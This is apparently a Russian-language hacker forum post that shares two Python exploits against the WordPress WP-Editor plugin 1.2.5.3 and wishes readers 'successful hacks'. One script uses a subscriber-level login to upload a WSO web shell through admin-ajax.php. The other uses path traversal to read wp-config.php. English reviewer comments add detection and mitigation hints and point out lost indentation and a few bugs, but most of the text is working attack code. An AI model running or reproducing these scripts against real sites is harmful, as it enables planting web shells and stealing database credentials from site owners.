Давно чот не палил приватных приватов. Будем исправлять...
Илитным отрядом красных боевых медведов был
написан набыдлокоден (уже больше года назад)
зироди говно-сплоет.
Похеканный плогин: https://wordpress.org/plugins/wp-editor/
Версия: 1.2.5.3
Активных инсталлов: 100,000+
Эксплоент:
#!/usr/bin/python
#coding: utf-8
"""
Exploit Title: Wordpress Plugin, Wp-Editor, Shell Upload
Date: 13/01/2015
Exploit Author: RedBear (krober.biz)
Software Link: https://wordpress.org/plugins/wp-editor/
Version: 1.2.5.3
Tested on: Apache, Wordpress 4.5
Vuln. Code:
file: ./wp-editor/classes/WPEditorBrowser.php
line: 228, function uploadThemeFiles()
line: 290, function uploadPluginFiles()
"""
# Reviewer notes (defensive summary of what this listing does):
# - Flow: log in through wp-login.php with an ordinary account (STEP 1),
#   POST a local file to /wp-admin/admin-ajax.php with action=upload_files
#   (STEP 2), then GET /wp-admin/<file> to see whether it was written (STEP 3).
#   The accompanying post states that a low-privilege (subscriber) login is
#   enough, i.e. the upload handlers named in the docstring do not check
#   the caller's capabilities.
# - Detection: POSTs to admin-ajax.php carrying action=upload_files together
#   with current_plugin_root or current_theme_root from non-administrator
#   sessions, and new .php files appearing directly under /wp-admin/.
# - Mitigation: remove the plugin or confirm a fixed release before keeping
#   it installed; the vulnerable functions are uploadThemeFiles() and
#   uploadPluginFiles() in WPEditorBrowser.php as listed above.
# NOTE(review): indentation was lost when this listing was pasted, so the
# nesting of the if-statements below cannot be recovered from the text.
import requests
import sys
# Pick an input() that works on both Python 2 and Python 3.
if sys.version_info[0]==2:
_input = raw_input
else:
_input = input
# Hard-coded target and credentials; an empty value is prompted for below.
domain = "www.example.com"
username = "hacker"
password = "31337"
# Local file to upload (read from the working directory, see STEP 2);
# `file` shadows a Python 2 builtin, kept as-is.
file = "wso2.php"
# Left True in the published script; see the exit() gate below.
kiddie = True
useragent = "Mozilla/5.0 (X11; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0"
#for tests in burp suite
# Every request in this script passes proxies=proxies, so as published it
# only runs while an intercepting proxy is listening on 127.0.0.1:8080.
proxies = {
"http": "http://127.0.0.1:8080",
"https": "http://127.0.0.1:8080",
}
if domain == "":
print("Type domain:")
domain = _input(">>").strip()
if username == "":
print("Type username:")
username = _input(">>").strip()
# As pasted this gate sits at top level and ends the script before any
# request is sent (kiddie is True above); it may originally have been nested
# under the username prompt -- cannot tell from the text.
if kiddie:
exit()
if password == "":
print("Type password:")
password = _input(">>").strip()
if file == "":
print("Type filename to upload:")
# NOTE(review): as written the prompt result is stored in `password`,
# not in `file`.
password = _input(">>").strip()
# Plain http URLs built by string concatenation; no scheme/host validation.
url_login = "http://"+domain+"/wp-login.php"
url_admin_ajax = "http://"+domain+"/wp-admin/admin-ajax.php"
########
# STEP 1
########
# Standard wp-login.php form login; the resulting cookies live in `session`
# and are additionally passed explicitly as cookies=r1.cookies in STEP 2.
session = requests.Session()
paramsPost = { "log":username,"testcookie":"1",
"rememberme":"forever",
"pwd":password,
"redirect_to":"http://"+domain+"/wp-admin/"
}
headers = { "Accept":"text/html",
"User-Agent":useragent,
"Referer":"http://"+domain+"/wp-login.php",
"Connection":"keep-alive",
"Content-Type":"application/x-www-form-urlencoded"
}
r1 = session.post(url_login, data=paramsPost, headers=headers, proxies=proxies)
# The login response is not inspected; this message is printed regardless.
print("Logged in...")
########
# STEP 2
########
# Upload shell method 1
# current_plugin_root
# Request to the plugin's admin-ajax handler: action=upload_files with
# current_plugin_root="." and an empty "directory". These three fields plus
# the multipart part named "file-0" are the request shape to alert on.
paramsPost = { "current_plugin_root":".",
"action":"upload_files",
"directory":""
}
# The file handle opened here is never closed.
paramsMultipart = [('file-0', (file, open(file,'rb'), 'application/octet-stream'))]
headers = { "User-Agent":useragent,
"Accept":"application/json"
}
r2 = session.post(url_admin_ajax, data=paramsPost, files=paramsMultipart, headers=headers, cookies=r1.cookies, proxies=proxies)
# r2 is not inspected either; success is judged only by STEP 3.
print("Try to upload shell...")
########
# STEP 3
########
# Verification is a plain GET of /wp-admin/<file>; only the status code is
# checked, so a 200 from any other handler would also be reported as success
# (the original comment below says the check is rough).
r3 = session.get("http://"+domain+"/wp-admin/"+file, proxies=proxies)
#Проверка не очень, сами допишите, под свой шелл
# (original comment: the check is weak; adapt it to your own file)
if r3.status_code == 200:
print("Shell uploaded: "+ "http://"+domain+"/wp-admin/"+file)
else:
print("Exploit failed...")
# Upload shell method 2
# Replace: "current_plugin_root" -> "current_theme_root"
Если зведы сойдутся, шелл будет лежать в папочке /wp-admin/. Ну и перед тем как запускать, положите в папочку с запускаемым скриптом wso2.php. К слову, там есть и читалка файлов, если залить шелл не получается:
#!/usr/bin/python
#-*- coding: utf-8 -*-
"""
Exploit Title: Wordpress Plugin, Wp-Editor, File Reader
Date: 13/01/2015
Exploit Author: RedBear (krober.biz)
Software Link: https://wordpress.org/plugins/wp-editor/
Version: 1.2.5.3
Tested on: Apache, Wordpress 4.5
Vuln. Code:
file: ./wp-editor/classes/WPEditorBrowser.php
function getFilesAndFolders()
"""
#Proof of Concept - read wp-config.php
# Reviewer notes (defensive summary of what this listing does):
# - Flow: log in through wp-login.php with an ordinary account (STEP 1), then
#   POST to /wp-admin/admin-ajax.php with action=ajax_folders and a "dir"
#   value containing "../" (STEP 2); the JSON "content" field of the reply is
#   printed. The accompanying post states a subscriber-level login suffices.
# - Detection: POSTs to admin-ajax.php with action=ajax_folders whose "dir"
#   parameter contains ".." or names files outside the theme/plugin tree,
#   especially from non-administrator sessions.
# - Mitigation: remove the plugin or confirm a fixed release; the function
#   named in the docstring, getFilesAndFolders(), is the entry point.
# NOTE(review): indentation was lost when this listing was pasted; the
# nesting of the if-statements below cannot be recovered from the text.
import requests
import sys
# Pick an input() that works on both Python 2 and Python 3.
if sys.version_info[0]==2:
_input = raw_input
else:
_input = input
# Hard-coded target and credentials; an empty value is prompted for below.
domain = "www.example.com"
username = "hacker"
password = "31337"
useragent = "Mozilla/5.0 (X11; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0"
if domain == "":
print("Type domain:")
domain = _input(">>").strip()
if username == "":
print("Type username:")
username = _input(">>").strip()
if password == "":
print("Type password:")
password = _input(">>").strip()
# Plain http URLs built by string concatenation; no scheme/host validation.
url_login = "http://"+domain+"/wp-login.php"
# Built here but not used below; STEP 2 rebuilds the same URL inline.
url_admin_ajax = "http://"+domain+"/wp-admin/admin-ajax.php"
session = requests.Session()
########
# STEP 1
########
# Standard wp-login.php form login; cookies are kept in `session` and also
# passed explicitly as cookies=r1.cookies in STEP 2.
paramsPost = { "log":username,"testcookie":"1",
"rememberme":"forever",
"pwd":password,
"redirect_to":"http://"+domain+"/wp-admin/"
}
headers = { "Accept":"text/html",
"User-Agent":useragent,
"Referer":"http://"+domain+"/wp-login.php",
"Connection":"keep-alive",
"Accept-Encoding":"gzip, deflate",
"Content-Type":"application/x-www-form-urlencoded"
}
r1 = session.post(url_login, data=paramsPost, headers=headers)
# The login response is not inspected; this message is printed regardless.
print("Logged in...")
########
# STEP 2
########
# The traversal is carried in "dir": "./../wp-config.php" steps one level
# above the directory the handler expects, with type=theme and contents=1
# asking for the file body rather than a listing.
paramsPost = {"action":"ajax_folders","dir":"./../wp-config.php","type":"theme","contents":"1"}
# Headers mimic the plugin's own admin-page XHR (Referer and
# X-Requested-With), so a User-Agent/Referer filter alone would not
# distinguish this request from legitimate use.
headers = { "Accept":"application/json, text/javascript, */*; q=0.01",
"X-Requested-With":"XMLHttpRequest",
"User-Agent":useragent,
"Referer":"http://"+domain+"/wp-admin/plugins.php?page=wpeditor_plugin",
"Connection":"keep-alive",
"Accept-Encoding":"gzip, deflate",
"Content-Type":"application/x-www-form-urlencoded"
}
r2 = session.post("http://"+domain+"/wp-admin/admin-ajax.php", data=paramsPost, headers=headers, cookies=r1.cookies)
# No status check: a non-JSON reply (e.g. a login failure page) makes
# r2.json() raise, and a reply without "content" raises KeyError.
jso = r2.json()
print(jso['content'])
Ах, да, совсем забыл. Для того, чтобы сплойт успешно отработал, нужен хотя бы самый галимый доступ (например, доступ подписчика). Ну вы понели...
В общем, удачных похеков (и покаков), поцоны)))